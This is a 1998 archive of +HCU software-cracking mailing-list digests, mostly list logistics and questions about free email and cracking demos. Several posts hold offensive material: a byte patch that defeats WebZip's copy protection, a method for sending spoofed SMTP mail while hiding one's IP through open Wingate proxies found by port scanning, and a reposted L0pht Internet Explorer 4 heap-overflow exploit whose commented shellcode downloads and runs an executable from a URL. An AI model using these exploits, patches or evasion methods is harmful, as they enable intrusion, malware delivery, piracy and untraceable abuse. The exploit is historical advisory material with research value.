Reverse Code Engineering RCE CD +sandman 2000

home *** CD-ROM | disk | FTP | other *** search

/ Reverse Code Engineering RCE CD +sandman 2000 / ReverseCodeEngineeringRceCdsandman2000.iso / RCE / Library / +HCU / 111-120.TXT < prev next >

Wrap

Text File | 2000-05-25 | 56KB | 1,608 lines

======================================================== +HCU Maillist Issue: 111 01/08/1998 -------------------------------------------------------- Send Articles To:......................... ************* Info, Help, Unsubscription, etc:....... **************** Web Repository.........................hcuml.home.ml.org ======================================================== CONTENTS: #1 Subject: ATTN: Aesculapius, Hackmore, Stone, Zer0degree #2 Subject: Correction ARTICLES: -----#1------------------------------------------------- Subject: ATTN: Aesculapius, Hackmore, Stone, Zer0degree You should have received an email from me for your address. I'm sending this message here in case the email got lost. If you haven't sent me your address yet, please do so soon. Thanks. ~~ Ghiribizzo -----#2------------------------------------------------- Subject: Correction -----BEGIN PGP SIGNED MESSAGE----- In the article I wrote concerning the Tutorial format and databases, some extra HTML tags seem to have appeared. The <bigger> and </bigger> tags were not in my original email and extra '<'s have been added to the tags I originally had in my email. Is this a bug from the script to handle the email or have they been added deliberately? ~~ Ghiribizzo -----BEGIN PGP SIGNATURE----- Version: PGP for Personal Privacy 5.0 Charset: noconv iQEVAwUBNLM2Yv2BzbC3j9ThAQFyFwf+LIEwsGteDx6clAn9zkFiRa0+22+oCJbS FYWWy2HeMRKQj3MxaTeVwGtwn30ez5LQmdbdmFszjcTHZIJBRu+QTmlBvQEoaw8M hOA5Y+utC/kqWXsu++mkqH78RFzm9sCTWnAi45hSSm+3SXDJTjFFAt5Qk9seBp0S fDDgf4uwAwU/DZGoyVxfL0/ca0rfbNvEFrzwC5GRqRDR4Hs+Ox/LWHlV3G/ay9bu Bypd6FFcsbQICpt5Kds3LfcQcMERl5GSRn5filzCqfErwiSiXtBZU9rT6oAjorpp 71jBfnnyqYse+trDIKjyLetKo3/LhxxzormJpFRUd4ELizEG+FgCrg== =sgle -----END PGP SIGNATURE----- =====End of Issue 111=================================== ======================================================== +HCU Maillist Issue: 112 01/09/1998 -------------------------------------------------------- Send Articles To:......................... ************* Info, Help, Unsubscription, etc:....... **************** Web Repository.........................hcuml.home.ml.org ======================================================== CONTENTS: #1 Subject: script is working well #2 Subject: none #3 Subject: Hotmail caveats ARTICLES: -----#1------------------------------------------------- Subject: script is working well Hi Ghiribizzo! The digester script is working well, the tags were in your mail exactly as they appeared in the issue. Either you sent them or the replay remailer inserted it (unlikely). In 95% of the cases the letter body are pasted into the digest byte by byte automatically, while I am sleeping :). Usually, only if the letter is sent to a wrong address I have the opportunity to check it before sending. Sometimes in those cases (like today the letter of Thor) if the lines are too long, I reformat it by inserting CR/LFs, but change nothing else. Here, I would like to ask all of you to use short 50-60 character lines, if possible. A great number of subscribers get the issues at hotmail where the letter window is small and more convinient to read shorter lines. (BTW, I am pleased that you do not send your letters as HTML formatted text too, which seems to be a new sport on other maillists since the new browsers came out :) bye Zer0+ -----#2------------------------------------------------- Subject: none This one again went to the wrong address. Boys, try to send the articles to the ************* address. Zer0+ Hi to all, and happy new year, I was reading the 109th +HCU mailing list and i notice that razzia+ wrote about the shrlk.dll, that reminds me a programm whith this dll (Shrlk20.dll - is it the same?), A little searching in my notes and voila. It was the webzip v. 1.30. In fact this was my first (and thank God succesfull cracking session). From my notes i copy: "It uses a DLL named Shrlk20.dll in the system32 dir which has all the routines, for the protection. Its checkprotectionDll routine doesn't respond to this type of crack. One byte changed from 7F07 E805 090000 IN THE SHRLK20.DLL to EB07à. From JG to JMP and its works OK" And i do remember that it had some modules including checkprotectionDll. When i cracked it i worried about this module but finally it was checking ...... the weather??? BTW i'm newbie nerd etc, but i'm trying I love you Guys... Hi to: Fravia+, (Hi Fravia!), Aeculapius (YES!) Keep on Thor+ -----#3------------------------------------------------- Subject: Hotmail caveats Hello everyone Hotmail and other mail providers have never been secure. I know definitely that bigfoot has given out details in the past. Though if you keep your activities legal and low-key you should be OK. encryption do the following: =====End of Issue 112=================================== ======================================================== +HCU Maillist Issue: 113 01/10/1998 -------------------------------------------------------- Send Articles To:......................... ************* Info, Help, Unsubscription, etc:....... **************** Web Repository.........................hcuml.home.ml.org ======================================================== CONTENTS: #1 Subject: ZipLock #2 Subject: Re: script is working well #3 Subject: Save disabled targets - MFC menu structures ARTICLES: -----#1------------------------------------------------- Subject: ZipLock Good evening to all. Has anybody worked on the ZipLock program, or rather software which has been wrapped up with ZipLock ? I think it might provide an interesting project. Best regards, Zipper49. **************************** ______________________________________________________ Get Your Private, Free Email at ********************** -----#2------------------------------------------------- Subject: Re: script is working well -----BEGIN PGP SIGNED MESSAGE----- -----#3------------------------------------------------- Subject: Save disabled targets - MFC menu structures Hi all, I've recently been looking at a Win32 demo program with disabled functionality. At first sight anyway all the code appears to be there <good!> but some menu functions are hardcoded disabled. The thing is written with MFC so all the menu handling is done through data structures with pointers to 'on_click' and update handlers for each menu item (or whatever they are called, I've never used MFC). I stumbled around and managed enable 'Save As' which is all I really need but I wonder if anyone knows more about the menu data structures MFC uses? A fragment of a menu item list looks like this dd 111h dd 0 dd 32855 ; Paste menu item ID dd 32855 dd 0Ch dd offset PasteClick ; Paste Handler dd 111h dd 0FFFFFFFFh dd 32855 dd 32855 dd 2Ch dd offset PasteUpdate ; Paste menu item update Handler Is this structure documented somewhere? Spyder ******************** =====End of Issue 113=================================== ======================================================== +HCU Maillist Issue: 114 01/12/1998 -------------------------------------------------------- Send Articles To:......................... ************* Info, Help, Unsubscription, etc:....... **************** Web Repository.........................hcuml.home.ml.org ======================================================== CONTENTS: #1 Subject: hmail ARTICLES: -----#1------------------------------------------------- Subject: hmail Hello Everyone Well it seems Iam back to hotmail problems again, e.g. only half of a Email message getting through,etc. Can anyone recommend any organisations offering free Email? The old and rest of the Email that did not make it. >Hotmail and other mail providers have never been secure. I know >definitely >that bigfoot has given out details in the past. Though if you keep >your activities legal and low-key you should be OK. >encryption. For someone who has not been surfing the Internet for very long. Iam starting to feel that I have entered a warzone, with all the security for Email, Webpages, Surfing the net, etc. Is it a losing battle or myopia on the part of Big Brother and other individuals who think they can gain total control? IMHO, the heterogenous of society will not let this take place. cheers Rundus ______________________________________________________ Get Your Private, Free Email at ********************** =====End of Issue 114=================================== ======================================================== +HCU Maillist Issue: 115 01/13/1998 -------------------------------------------------------- Send Articles To:......................... ************* Info, Help, Unsubscription, etc:....... **************** Web Repository.........................hcuml.home.ml.org ======================================================== CONTENTS: #1 Subject: long rambling bs on freemail, etc... #2 Subject: Iname #3 Subject: free mailbox #4 Subject: hmail ARTICLES: -----#1------------------------------------------------- Subject: long rambling bs on freemail, etc... Rundus: First of all, here are a few resources for free email, etc.. *********************************************************** ************************************************** ************************************************************************************************* Now security is always going to be a problem...when sending, many of these freemail providers include your IP address as part of the email header. For anonymity, this is no good. Your best bet for security when sending email--assuming you do not want the person you are sending to to have any info about you--is using ************** or ****************** (these both have WWW-based anonymous emailers). When receiving email, as long as you use a psuedonym on your email account, everything will be fine. You can assume that everything going in and out of your email account can be read by any one at any time...there is no way to stop that (except by encrypting your emails, which somewhat detracts from the convenience of the medium), but you can stop that email account from being traced to your person or your PC. Why all this healthy paranoia? Because it is so "simple", or so commonly done...there is no real privacy. Except for the real privacy: being lost in the crowd. You see, there is just too damn much traffic on the internet for it all to be monitored for incriminating material. To illustrate:I once worked at a 24/7 market which had upwards of twenty cameras running full time and recording everything...they had to change twenty VCR tapes every four hours! Good security? Not quite. The store could not afford to pay anyone to watch 20x24hours worth of video tapes a day...therefore the employees and customers were able to rob the place blind! The tapes were _only_ good for nailing someone that they knew was up to something... Get the picture? If you are not suspect, you are "safe". The trick is to be careful and not stupid...use fake names, do not send emails from your personal machine (except through an anonymizer) if you think the person on the other end is going to try to trace back to you (i.e., a VB programmer wouldn't but a cracker might just for fun!)--guard your IP address, it leads to your ISP! Other than that, unless you put big signs up on your web page posting how you hacked the FBI's site, you are probably alright. _m ______________________________________________________ Get Your Private, Free Email at ********************** -----#2------------------------------------------------- Subject: Iname I have found ************* to be very reliable and fast. I have no idea about its security. I suspect it is no better than other free email services. Anyone know? zinger -----#3------------------------------------------------- Subject: free mailbox Rundus wrote: >Well it seems Iam back to hotmail problems again, e.g. only half >of a Email message getting through,etc. Can anyone recommend any >organisations offering free Email. I also noticed that hotmail was completely down a couple of times lately (seems MS really started to take over it :) In my experiance netaddress.usa.net works fine. It also has the advantage that you can download your mail by any POP3 mailer. Zer0+ -----#4------------------------------------------------- Subject: hmail -----BEGIN PGP SIGNED MESSAGE----- Netforward offer a email forwarding service if that's what you want. Otherwise you could try Geocities. They offer free web pages and also give out free email addresses. Just signup and post a bogus boring web site and you've got an email account. Oh, you need an email account to set it up - last time I did this, Geocities accepted hotmail addresses. As for the incomplete email, I got that too. It looks like an echo of part of a message I posted in an earlier issue. I think something is wrong because first of all the HTML tags were added to my post (the tags are NOT in the copy of the email I sent in the outbox) and then a PGP signed message I sent was not transmitted properly (only the first PGP line was shown) and now this echo. Anyone got any idea what's going on? ~~ Ghiribizzo -----BEGIN PGP SIGNATURE----- Version: PGP for Personal Privacy 5.0 Charset: noconv iQEVAwUBNNObf/2BzbC3j9ThAQErwAgAt6hsteSyHpy0F+67Wv4pecv6UdMhh+ki WVE9k/kHlUJ5XfqW2I0ZzjDFuG+7OyRf13LH5S2Wv5XE3bZJVzjZ65nCNnvdPnRj WYbEC5+m2jJo9q5w3x0+zs1+oblhdzYvPvH77UMAfoiBld5Zl6vSlL6Ja+XVL5yl RfqdVadw2G1g0ngAQ9wX9IlOylamx7HnkFzHTndkwKeFiFmaueaNxkr2zMQ/5Xo2 WtAK4jxAqsMTrTA+QIeM8AdrHX6+Crzc94KIz/73LxhlJtcGOSuKNPiHiCp7AdNy nGO59xPU/NEUX/9ojcuj0NJeTu4uU4YhiCWImLVoCHNTLfduFNmDuQ== =wcoE -----END PGP SIGNATURE----- =====End of Issue 115=================================== ======================================================== +HCU Maillist Issue: 116 01/15/1998 -------------------------------------------------------- Send Articles To:......................... ************* Info, Help, Unsubscription, etc:....... **************** Web Repository.........................hcuml.home.ml.org ======================================================== CONTENTS: #1 Subject: Thank You #2 Subject: for java buff (by fravia+) #3 Subject: Anonymous (?) email... #4 Subject: +RCG's 'Heavy Protection' #5 Subject: M$ Explorer Flaw ARTICLES: -----#1------------------------------------------------- Subject: Thank You Hello Everyone I would like to thank everyone for their replies and help. With regards to Email security, its an area in which I must allocated more time and effort too. Iam sure Fravia knows what I eat for breakfast :-). cheers Rundus ______________________________________________________ Get Your Private, Free Email at ********************** -----#2------------------------------------------------- Subject: for java buff (by fravia+) A nice present for all our java buffs, I believe :-) s/install/ 'course you can go -----#3------------------------------------------------- Subject: Anonymous (?) email... Since it seems to be of great importance to find a better/more anonymous way to send and receive email, some tricks of the trade which can really assist you in defending your privacy: (this tricks are only for SENDING mail, since receiving is not that much a problem) Get a shell account or something similar; at least a telnet client is necessary. You can send email by telnetting to a mailserver to port 25 (telnet victim.com 25) and then using the SMTP commands. "HELO **************** /* introduces you to the server */ "mail from: ******************* /* this will appear in the header */ "rcpt to: ****************** /* obvious */ "data" Now enter your email, end of email is signalled by a single "."(enter) O.K, now we get a small problem: 99% of all mailservers log your IP and stamp it on top of the mail, which is something we strongly want to avoid. Now, to disguise this IP, we use either the WinGate- bouncing or FTP-bouncing attack. I won't go into details about FTP- bouncing, Hobbit wrote a good paper about that. Wingate is another trick how Windoze can be good for you: It is a prog which allows a whole network to use one connection, nice for schools etc. Now, the bug is: If you telnet to a Wingate on port 23, you'll most likely get a prompt like this "Wingate> ". If you have found one, you've struck gold, since you can now enter the hostname & port you want to telnet to, and Wingate will connect you :-), effectively disguising your IP. This is said to be fixed in the newest version, but there are still plenty of old Wingates out. Note: Attention, you're NOT 100%ly untraceable, since some Wingates log such activity. (most do not, though). How to find Wingates ? This is a bit of work. Write yourself a small C-program, or download a portscanner from the internet. If you write your own, all it has to do is to try to open a connection on port 23 to a whole bunch of IP-Adresses you specify, and then logging all who respond into a file (with their response). Lateron, you just search through that file for the Wingate prompt. Multiple bounces are possible, thus lowering the chance of being logged. Another thing I haven't tried yet (since I don't know yet how to write raw packets) is to fake the reply-address in the packetheader; this might work since sending mail doesn't require you to receive data. (You'd better fake it to an IP whose server is down, though, :-) Anybody here who is interested in that kind of stuff ? Learning in groups is always more fun than alone :-) Halvar from Flake :-) ______________________________________________________ Get Your Private, Free Email at ********************** -----#4------------------------------------------------- Subject: +RCG's 'Heavy Protection' Well, I downloaded some of the essays regarding +RCG's self32 protection and then decided to download his 'heavy' protection. In the few intervening minutes I saw that Fravia had updated his page and that Quine had already cracked it! You really have to be quick off the mark to be the first these days :) I quote part of the letter by Quine which can be found on the protecti page. >>>> with the hasp encryption. The solution, by the way, is to create a 10h byte long file called key.dat which contains 00h through 0Fh. The key, as +RCG tells us is too easy, but even with a completely random key of 10h bytes it would have taken about 2 minutes to find it. I'm not going to explain how I figured out that it was a 10h byte string xor'd with the code from 4012B9h to 401300h because it's fairly easy to figure that out. Here's how to find the key. Isolate the encrypted bytes in their own file, load that file in HexWorkshop, and print it out. You Should have something that looks like this: <<<< The length of the file is basically given to us in the exe. This could be improved slightly by reading say 100h bytes and then XORing until a terminator (00h) was found and then encrypted again. This would conceal the filelength using the source sniff method. It would still, however, be susceptible to a more 'cryptographic' approach. This method (counting coincidences) is simple and is outlined in Bruce Schneier's book 'Applied Cryptography' (a must buy for all crackers). Oh, this quote should be learned by all protectionists: "There's no real security here. This kind of encryption is trivial to break even without computers." [regarding XOR encryption] He then goes on to list the method of breaking XOR encryption. The key flaw in the protection was using a short key. The key used MUST be the SAME length as the code to be encrypted (i.e. an OTP) The real difficulty is programming a random number generator for the OTP as the entire security of the system lies in the RNG. I noticed chaos being mentioned in one of RCG's later essays and I toyed with the idea of using a one dimensional chaotic system (Sierepinski Carpet (sp?)) as a RNG but it was too much of a headache making sure the numbers were truely random. Your best bet is to look out for some ready made RNGs make sure that they designed for cryptography and not just some homegrown RNG. To my knowledge, no one has yet made a truely random RNG. ~~ Ghiribizzo BTW, never reuse an OTP, this destroys it's security. -----#5------------------------------------------------- Subject: M$ Explorer Flaw Yes, I DO know that this is NOT a hacking-related mailinglist, but I got a few thoughts to share as well as an interesting article from Bugtraq.... First of all: In hacking, the most important things needed was C programming and UNIX knowledge, since most servers used to run on UNIX or derivatives. But now, that M$ NT takes over more and more sites, the importance of C slowly fades, often replaced with ASM. The methods change radically. The so-called "Buffer overflow exploits" are IMHO more related to "cracking" in the widest sense than to anything else. I won't go into detail about them, anyone interested should read Aleph1s Article in Phrack... (was it 49?) Anyways, the following text demonstrates how knowledge of assembly and some good ideas can be used to strike major blows at the M$ Juggernaut. Nothing strikes the trust of people harder than vulnerabilities like this; and this is an encouragement for all those Windows-Assembly Gurus out there (I am unfortunately more into learning C right now and it's hard for me to use Win95 once you've come to install Linux :-) or even the HCU to start a project concerning M$ security flaws. Anyways, the following article comes directly from BugTraq, and can be viewed at l0pht.com. ======== Scenario ======== TAKE TWO! The Microsoft Internet Explorer 4.0(1) Suite, including all programs supplied with it that read and/or process HTML from either local machines, intranet machines, or remote internet machines are subject to a buffer overflow in the HTML decoding process. The buffer overflow can cause the application to page fault, or in the worst case, execute arbitrary precompiled native code. Unlike the res:// bug, found a few months ago, this bug _does_ affect Windows NT as well as Windows 95. It has also been reported that this bug affects Internet Explorer 3.0 if you have Visual Studio (VC++/J++ etc) installed on your system. Though this may be true, and if so, exploitable, there has not been exploit code written up for it. Currently, sample exploit code has been written for: Windows 95 OSR1 and OSR2 running IE4.0 or IE4.01 Systems known vulnerable: Windows 95 OSR1, OSR2 running IE3.0x+Infoviewer, IE4.0, IE4.01 Windows NT Workstation/Server running IE4.0,IE4.01 ======= Example ======= Much like the res:// overflow, this bug can be seen in action by clicking on a link -or- having the browser auto-refresh to a URL with the executable code in the url. Please look at the L0pht Advisory homepage for this bug for a detailed example of the problem. ================= Technical Details ================= The problem here lies in the deciphering of the URL line format itself. The base HTML library that is used by the Internet Explorer 4.0 Suite and the following programs are vulnerable: - Outlook Express (both mail and news) - Windows Explorer - Internet Explorer (different than regular explorer, really) This problem, because it stems from a programming flaw in the HTML decoding system, is unaffected by the Explorer "Security Zones" feature. In other words, if you turn on the highest security level for the zone from where the exploit HTML is being viewed, you are still vulnerable. The critical problem here is a buffer overflow in the parsing of a particular new type of URL protocol. The "mk:" type of URL is meant to access proprietary Microsoft 'InfoViewer Topics', as exhibited by the InfoViewer of Visual Studio, and the Help System of IE4.0(1). For example, the URL for the Microsoft IE4.0 help system is: ***************************************************************** The buffer overflow is not a standard stack overflow, but rather a _heap_ overflow. This complicated coding exploits, but is, nonetheless, do-able. ======== Solution ======== Currently, there is no solution available for this flaw. You can't set any Internet Explorer options to avoid it, and you are not protected by any level of zone security. Simply don't surf the web, read email or view net news using Internet Explorer 4.0(1) until Microsoft puts up a hotfix. ============ Exploit Code ============ Ok. This time, I'm going to assume you know something about stack overflows and writing generic buffer overflow scripts. If you're lost already, then the rest of this sure as hell ain't going to make any sense to you. The exploit code overflows a buffer on the heap, overwriting a few critical heap variables and, eventually leaving the EIP at a ridiculous point in the middle of URLMON.DLL ready to crash, unless you, bold coder, know what to stuff in those registers. Turns out that when you overflow that heap buffer, you can stuff a value right into EAX. This is important, because the critical code section that you reach looks like this: (URLMON!.text+) 014F:702A365E 8B08 MOV ECX,[EAX] 014F:702A3660 50 PUSH EAX 014F:702A3661 FF5108 CALL [ECX+08] (Incidentally, all the addresses here are for DLL's provided with IE4.01 not IE4.0. The code is similar for IE4.0. Just different offsets. Onward.) You need that CALL [ECX+08] to jump to something useful. The place where it jumps is to a location in URLMON.DLL (or was it MSHTML.DLL, I forget.) that has an instruction that looks like CALL ECX. To get the NULL bytes and things in the right places involves a little finagling of the string using %00, and the null-terminator of the URL. It's really fun. Trust me. After that CALL ECX happens, your EIP points to a piece of code that is in your exploit space. Then, just jump to the beginning of the exploit code and start having fun. I used CALL to save a byte. (Who cares about the stack now anyway? You've already blown it to hell.) Ok. Here's it. (Described in terms of IE4.01) Commented disassembly: (starting at **************** > Skip over the jump tables 0057CC7C: 3BC0 cmp eax,eax 0057CC7E: 7468 je 00057CCE8 > blah blah blah 0057CC80: 90 nop 0057CC81: 90 nop 0057CC82: 90 nop > Jump tables start here for WININET.DLL functions > WinInet Function addresses: > > (dated 9/18/97) IE4.0 (dated 11/18/97) IE4.01 > InternetOpenA 0x702120B9 0x70211817 > InternetOpenUrlA 0x7021949F 0x70219345 > InternetCloseHandle 0x7020422B 0x7020422E > InternetReadFile 0x7020E2DC 0x7020E3C4 0057CC83: BFE9E7DE8F mov edi,08FDEE7E9 (InternetOpenA) 0057CC88: F7DF neg edi 0057CC8A: FFE7 jmp edi 0057CC8C: BFBB6CDE8F mov edi,08FDE6CBB (InternetOpenUrlA) 0057CC91: F7DF neg edi 0057CC93: FFE7 jmp edi 0057CC95: BFD2BDDF8F mov edi,08FDFBDD2 (InternetCloseHandle) 0057CC9A: F7DF neg edi 0057CC9C: FFE7 jmp edi 0057CC9E: BF88C741E0 mov edi,0E041C788 (InternetReadFile) 0057CCA3: D1EF shr edi,1 0057CCA5: FFE7 jmp edi > End WININET Jump Table 0057CCA7: 90 nop > Start Kernel Offset Table for Win95 OSR 2 (no bad characters/nulls/otherwise!) > Win95B Function addresses: > > WinExec (0xBFF9D330) > _lopen (0xBFF773FB) > _lclose (0xBFF98283) > _lwrite (0xBFF9CDE8) > _lcreat (0xBFF9CDBE) > ExitProcess (0xBFF8AECD) > GlobalAlloc (0xBFF74904) 0057CCA8: 30 D3 F9 BF-FB 73 F7 BF-83 82 F9 BF-E8 CD F9 BF 0057CCB8: BE CD F9 BF-CD AE F8 BF-04 49 F7 BF- > Start Kernel Offset Table for Win95 OSR 1 (no bad ones here either!) > Win95A Function addresses: > > WinExec (0xBFF9D330) > _lopen (0xBFF773FB) > _lclose (0xBFF98283) > _lwrite (0xBFF9CDE8) > _lcreat (0xBFF9CDBE) > ExitProcess (0xBFF8AECD) > GlobalAlloc (0xBFF74904) 0057CCC4: F8 CF F9 BF-B7 72 F7 BF-CF 80 F9 BF-B0 CA F9 BF 0057CCD4: 86 CA F9 BF-B0 AF F8 BF-04 49 F7 BF- > blah blah blah 0057CCE4: 90 nop 0057CCE5: 90 nop 0057CCE6: 90 nop 0057CCE7: 90 nop 0057CCE8: 90 nop > check windows kernel version by querying random byte that happens to > be different in the two versions. Also, set up ESI to be a pointer to > the kernel offset table for the correct version. 0057CCE9: BB8BFFF7BF mov ebx,0BFF7FF8B 0057CCEE: 2AFF sub bh,bh 0057CCF0: 8BF5 mov esi,ebp 0057CCF2: B032 mov al,032 0057CCF4: 3803 cmp [ebx],al 0057CCF6: 750E jne 00057CD06 0057CCF8: 33C0 xor eax,eax 0057CCFA: B05F mov al,05F 0057CCFC: 90 nop 0057CCFD: 03F0 add esi,eax 0057CCFF: 720E jb 00057CD0F 0057CD01: 90 nop 0057CD02: 90 nop 0057CD03: 90 nop 0057CD04: 90 nop 0057CD05: 90 nop 0057CD06: 33C0 xor eax,eax 0057CD08: B07B mov al,07B 0057CD0A: 90 nop 0057CD0B: 03F0 add esi,eax 0057CD0D: 90 nop 0057CD0E: 90 nop 0057CD0F: 90 nop > ESI is now a pointer to the first function the the appropriate kernel > offset table. Now, we need to decode our 'data segment'. Do so, by XOR'ing > (ADD'ing) each byte of the data area with 0x80. This prevents people from > seeing what we're doing, as well as keeping out null characters and bad > stuff in the exploit string. 0057CD10: 33C9 xor ecx,ecx 0057CD12: 66B95D01 mov cx,0015D 0057CD16: 03CD add ecx,ebp 0057CD18: B238 mov dl,038 ;"8" 0057CD1A: 800180 add b,[ecx],080 ;"½ 0057CD1D: 41 inc ecx 0057CD1E: 4A dec edx 0057CD1F: 75F9 jne 00057CD1A ---- 0057CD21: 90 nop 0057CD22: 90 nop > It becomes clear where we're going :) > Let's allocate some memory. 65535 bytes to be precise. 0057CD23: 66BAFFFF mov dx,0FFFF ;"__" 0057CD27: 52 push edx 0057CD28: 33D2 xor edx,edx 0057CD2A: 52 push edx 0057CD2B: FF5618 call d,[esi][00018] 0057CD2E: 8BD8 mov ebx,eax > Ok. Now we go ahead and call InternetOpenA and keep that Internet handle > in EAX. Why do I call this function twice? I don't know. I was debugging > and I never took it out. NOP it if you want. I don't care. 0057CD30: 33D2 xor edx,edx 0057CD32: 52 push edx 0057CD33: 52 push edx 0057CD34: 52 push edx 0057CD35: 52 push edx 0057CD36: 90 nop 0057CD37: 6681C25D01 add dx,0015D 0057CD3C: 03D5 add edx,ebp 0057CD3E: 52 push edx 0057CD3F: E83FFFFFFF call 00057CC83 0057CD44: E83AFFFFFF call 00057CC83 > Now we call InternetOpenUrlA, getting us ready to download a file from > the net into that buffer we allocated 0057CD49: 33D2 xor edx,edx 0057CD4B: 52 push edx 0057CD4C: 52 push edx 0057CD4D: 6AFF push 0FF 0057CD4F: 52 push edx 0057CD50: 6681C26501 add dx,00165 0057CD55: 03D5 add edx,ebp 0057CD57: 52 push edx 0057CD58: 50 push eax 0057CD59: E82EFFFFFF call 00057CC8C > We then go ahead and call InternetReadFile, downloading 65535 bytes from the > net and into the buffer. 0057CD5E: 8BD5 mov edx,ebp 0057CD60: 83C230 add edx,030 0057CD63: 90 nop 0057CD64: 90 nop 0057CD65: 52 push edx 0057CD66: 2BC9 sub ecx,ecx 0057CD68: 6649 dec cx 0057CD6A: 51 push ecx 0057CD6B: 53 push ebx 0057CD6C: 50 push eax 0057CD6D: E82CFFFFFF call 00057CC9E > Call _lcreat, and make us a place to store what we downloaded. 0057CD72: 33D2 xor edx,edx 0057CD74: 52 push edx 0057CD75: 6681C25D01 add dx,0015D 0057CD7A: 03D5 add edx,ebp 0057CD7C: 52 push edx 0057CD7D: FF5610 call d,[esi][00010] > ok, call _lwrite and write the buffer to the file. 0057CD80: 8BD5 mov edx,ebp 0057CD82: 83C230 add edx,030 ;"0" 0057CD85: 8B12 mov edx,[edx] 0057CD87: 52 push edx 0057CD88: 53 push ebx 0057CD89: 50 push eax 0057CD8A: 8BD8 mov ebx,eax 0057CD8C: FF560C call d,[esi][0000C] > Close the file with _lclose. 0057CD8F: 53 push ebx 0057CD90: FF5608 call d,[esi][00008] > Now run what we downloaded by calling WinExec! 0057CD93: 33D2 xor edx,edx 0057CD95: 42 inc edx 0057CD96: 52 push edx 0057CD97: 6681C25C01 add dx,0015C 0057CD9C: 03D5 add edx,ebp 0057CD9E: 52 push edx 0057CD9F: FF16 call d,[esi] > And go ahead and kill the Internet Explorer process. It's pretty > bung'd out by now, and if we don't kill it, it will kill itself :) 0057CDA1: FF5614 call d,[esi][00014] > The rest of this is left as an exercise to the reader, and is really only > worth about 5 minutes of staring at. (Though it took about 5 or so hours to > come up with!) Basically, you just gotta play around with your debugger > and work those registers. Be clever, and you'll get something like this: 0057CD98: - - -2D 2D E6 EF 0057CDA8: EF AE E5 F8-E5 80 E8 F4-F4 F0 BA AF-AF F7 F7 F7 0057CDB8: AE EC B0 F0-E8 F4 AE E3-EF ED AF FE-E4 E9 EC E4 0057CDC8: EF E7 AF E9-E5 B4 DF ED-EB AF E6 EF-EF AE E5 F8 0057CDD8: E5 80 AD AD-AD AD AD AD-F3 9A 57 25-30 30 2D 2D 0057CDE8: 2D 2D 2D 2D-2D 2D 2D 2D-2D 2D 2D 2D-2D 2D 2D 2D 0057CDF8: 2D 2D 2D 2D-2D 2D 2D 2D-2D 2D 2D 2D-2D 24 25 26 0057CE08: 27 28 29 2A-2B 2C 2D 2E-2F 30 31 32-33 34 35 36 0057CE18: 37 38 39 3A-3B 3C 3D 3E-3F 40 80 81-82 83 84 85 0057CE28: 86 87 88 E9-E8 4B FE FF-FF C0 74 F7-8A 2F 27 70 0057CE38: DB CD 57 22-3E 0D 0A 57-68 65 6E 20-79 6F 75 27 0057CE48: 72 65 20 72-65 61 64 79-2C 20 63 6C-69 63 6B 20 0057CE58: 68 65 72 65-2E 0D 0A 3C-2F 61 3E 0D-0A 3C 2F 63 0057CE68: 65 6E 74 65-72 3E 0D 0A-3C 2F 62 6F-64 79 3E 0D 0057CE78: 0A 3C 2F 68-74 6D 6C 3E-0D 0A 0D 0A-0D 0A 0D 0A 0057CE88: 0D 0A - - - > Phew! Anyway. The short and long of all that disassembly is this: 1. It downloads a <64K file from the internet (any URL) Using the current firewall and proxy settings... 2. It saves it as "foo.exe" on your desktop (probably) 3. It runs the executable. 4. To see which URL it is downloading, just XOR the tail end of the exploit string with 0x80's. Hope you caught all that. ------------------------------ A haiku: Strike two for I.E. Common buffer overflows Is that all of them? **************** (01/13/97) --- Liked it ? :-) Halvar ______________________________________________________ Get Your Private, Free Email at ********************** =====End of Issue 116=================================== ======================================================== +HCU Maillist Issue: 117 01/16/1998 -------------------------------------------------------- Send Articles To:......................... ************* Info, Help, Unsubscription, etc:....... **************** Web Repository.........................hcuml.home.ml.org ======================================================== CONTENTS: #1 Subject: Re: freemail #2 Subject: could be an interesting protection, anyone checking? #3 Subject: help on disassembling file #4 Subject: smtp question - maybe i missed something (+gthorne) #5 Subject: Re: Stuck with Everlock #6 Subject: Anonymous Remailers ARTICLES: -----#1------------------------------------------------- Subject: Re: freemail >>> When receiving email, as long as you use a psuedonym on your email account, everything will be fine. You can assume that everything going in and out of your email account can be read by any one at any time...there is no way to stop that (except by encrypting your emails, which somewhat detracts from the convenience of the medium), but you can stop that email account from being traced to your person or your PC. <<< Using a nymserver will shorten the exposure to just between the sender and nymserver. Of course the sender could encrypt. Encryption is handled quite painlessly by using Eudora Pro which has PGP extensions built into it. (using PGP 5). Worth checking out... ~~ Ghiribizzo -----#2------------------------------------------------- Subject: could be an interesting protection, anyone checking? forwarded -------------Forwarded Message----------------- From: Tony & CAthy, ********************** To: , ********************** Date: 15-01-98 5:36 RE: request for tutorail: Firehand Ember 3.1.1 Sender: ************* Received: from galaxy.chez.com ([194.98.133.161] (may be forged)) by dub-img-3.compuserve.com (8.8.6/8.8.6/2.10) with ESMTP id XAA05970 for **************************** Wed, 14 Jan 1998 23:35:53 -0500 (EST) Received: from dwx1.dwx.com (dns1.dwx.com [207.206.192.1]) by galaxy.chez.com (8.8.5/8.8.5) with ESMTP id FAA25340 for **************** Thu, 15 Jan 1998 05:35:08 +0100 (CET) Received: from tony1.dwx.com (as-dwx-7-15.dwx.net [207.206.193.177]) by dwx1.dwx.com (8.8.5/8.8.5) with SMTP id WAA28929 for **************** Wed, 14 Jan 1998 22:34:08 -0600 (CST) Message-ID: *********************** Date: Wed, 14 Jan 1998 22:36:35 -0800 From: Tony & CAthy *************** X-Mailer: Mozilla 2.0 (Win95; U) MIME-Version: 1.0 To: ************* Subject: request for tutorail: Firehand Ember 3.1.1 X-URL: ************************************ Content-Type: text/plain; charset=us-ascii Content-Transfer-Encoding: 7bit I would like to see a tutorial on cracking Firehand Ember 3.1.1 from ***************** It can detect that it's code has been altered and then it locks you out and warns you not to try it again or it will delete your hard drive etc.... I think it would be VERY interresting..... Thanks for all your hard work. +tc -----#3------------------------------------------------- Subject: help on disassembling file Hi All I am working on a demo which as several menu options disabled. However using BRW 4.5 I saw that the menus are all initially enabled. I tried to bpx on enablemenuitem to see what I could find but I was stuck inside MFC calls all the time. Now comes my real problem: When I tried to use wdasm89 on it the prog replied saying that the file does not have a win95 header nor the other type headers like PE, NE or 16 bit header. To disassemble I need to give the right file offset to begin disassembling the file. How do I find it? The demo docs says the program runs in win95 or win3.11 with win32s. Maybe this is the problem. I tried to find something using QuickView but maybe I don't know where to look. Any hints appreciated. PopJack ______________________________________________________ Get Your Private, Free Email at ********************** -----#4------------------------------------------------- Subject: smtp question - maybe i missed something (+gthorne) i know it is rare for me to ask much - but i have a 